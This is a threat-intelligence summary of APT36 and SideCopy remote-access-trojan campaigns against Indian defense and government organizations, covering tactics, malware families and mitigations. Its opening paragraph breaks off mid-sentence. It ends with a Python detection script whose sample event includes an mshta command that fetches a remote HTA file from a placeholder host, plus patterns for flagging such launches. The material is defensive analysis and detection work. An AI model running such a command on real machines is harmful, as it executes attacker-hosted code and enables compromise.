Full Report
Indian defense sector and government-aligned organizations have been targeted by multiple campaigns that are designed to compromise Windows and Linux environments with remote access trojans capable of stealing sensitive data and ensuring continued access to infected machines. The campaigns are characterized by the use of malware families like Geta RAT, Ares RAT, and DeskRAT, which are often
Analysis Summary
# Threat Actor: APT36 and SideCopy
## Attribution & Identity
**Identified Actors:** APT36 and SideCopy.
**Known Aliases/Associations:** APT36 is also known as Transparent Tribe. SideCopy is assessed to operate as a subdivision of Transparent Tribe (APT36). These clusters are attributed to state-sponsored activity aligned with Pakistan.
## Activity Summary
The actors are conducting multiple, cross-platform campaigns targeting Indian entities. These campaigns aim to compromise Windows and Linux environments using Remote Access Trojans (RATs) to steal sensitive data and maintain long-term access. The operations are characterized by maintaining a low profile ("operating below the noise floor") while strategically focusing on specific sectors.
## Tactics, Techniques & Procedures
- **Initial Access:** Phishing emails containing malicious attachments or embedded download links.
- **Delivery Mechanisms:** Delivery of Windows shortcuts (LNK), ELF binaries, and PowerPoint Add-In files.
- **Windows Execution Chain:** Malicious LNK files invoking `mshta.exe` to execute an HTML Application (HTA) file hosted on compromised legitimate domains.
- **Payload Staging:** The HTA payload uses JavaScript to decrypt an embedded DLL payload, which writes a decoy PDF to disk before establishing C2 communication.
- **Defense Evasion:** Malware checks for installed security products and adapts persistence methods accordingly.
- **Persistence:** Mechanisms for continued access after compromise, with the method chosen according to the security products detected on the host (see Defense Evasion).
- **Command & Control:** Communication with C2 servers whose addresses are hard-coded into the malware stages.
- **Cross-Platform Capability:** Deploying equivalent malware families on both Windows and Linux.
- **Memory-Resident Techniques:** Increasing use of memory-resident techniques in place of on-disk components.
## Targeting
- **Sectors:** Indian defense sector, government-aligned organizations, policy organizations, research institutions, critical infrastructure, and defense-adjacent organizations.
- **Geography:** India.
- **Victims:** Unspecified organizations within the Indian defense and government sectors.
## Tools & Infrastructure
- **Malware families used:**
  - Geta RAT (used primarily on Windows; capable of extensive system reconnaissance, data harvesting, and file operations).
  - Ares RAT (Python-based; used on Linux environments).
  - DeskRAT (Golang malware).
- **Infrastructure:** Attacker-controlled infrastructure, including compromised legitimate domains hosting HTA files and remote servers for fetching secondary payloads. C2 servers are hard-coded within the malware stages.
## Implications
The campaigns demonstrate a well-resourced, espionage-focused threat actor that is refining its tradecraft by expanding cross-platform coverage (Windows and Linux) and utilizing sophisticated, multi-stage delivery chains involving legitimate system tools (e.g., `mshta.exe`). The continuous strategic focus on the Indian defense and government ecosystem poses a significant espionage risk.
## Mitigations
- Enhance vigilance against phishing attempts utilizing defense or government-themed lures.
- Implement robust endpoint detection and response (EDR) solutions capable of monitoring obfuscated execution chains involving utilities like `mshta.exe`.
- Scrutinize the execution of common file types like LNK files and macros embedded in PowerPoint Add-Ins.
- Ensure security controls are effective across both Windows and Linux endpoints to counter cross-platform malware deployment.
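As an added illustration of the EDR monitoring recommended above for the LNK → `mshta.exe` → remote HTA chain described in the Windows Execution Chain, the following detection logic (written for this page, not taken from any vendor product or from the report) scores constructed process-creation events. Field names loosely follow Sysmon Event ID 1; the domain and file paths are placeholders, not indicators from the campaigns.

```python
import ntpath
import re

# Constructed sample events (not real IoCs); fields modelled on Sysmon Event ID 1.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "mshta.exe https://compromised-site.example/notice.hta"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Vendor\setup.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\wizard.hta"'},
    {"image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe brief.txt"},
]

REMOTE_TARGET = re.compile(r"(https?://|ftp://|\\\\)", re.IGNORECASE)  # URL or UNC path
HTA_TARGET = re.compile(r"\.hta\b", re.IGNORECASE)

def score_event(event):
    """Return (severity, reasons) for one event; severity 0 means not mshta at all."""
    if ntpath.basename(event["image"]).lower() != "mshta.exe":
        return 0, []
    cmd = event["cmdline"]
    parent = ntpath.basename(event["parent_image"]).lower()
    reasons, severity = [], 1          # any mshta launch is worth a look
    if REMOTE_TARGET.search(cmd):
        severity = 3                    # HTA fetched from a remote host
        reasons.append("mshta given a remote target")
    elif HTA_TARGET.search(cmd):
        severity = 2                    # local .hta; less typical of this chain
        reasons.append("mshta given a local .hta file")
    if parent == "explorer.exe":
        # Double-clicking a shortcut (LNK) launches the child via Explorer.
        severity = min(severity + 1, 4)
        reasons.append("launched from explorer.exe (consistent with an LNK click)")
    return severity, reasons

def find_suspicious(events, threshold=3):
    """Return events scoring at or above threshold, highest severity first."""
    hits = []
    for ev in events:
        severity, reasons = score_event(ev)
        if severity >= threshold:
            hits.append({"cmdline": ev["cmdline"], "severity": severity, "reasons": reasons})
    return sorted(hits, key=lambda h: -h["severity"])

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(hit["severity"], hit["cmdline"], "|", "; ".join(hit["reasons"]))
```

Lowering `threshold` to 2 also surfaces local `.hta` launches, which is noisier but catches staging from a file already on disk.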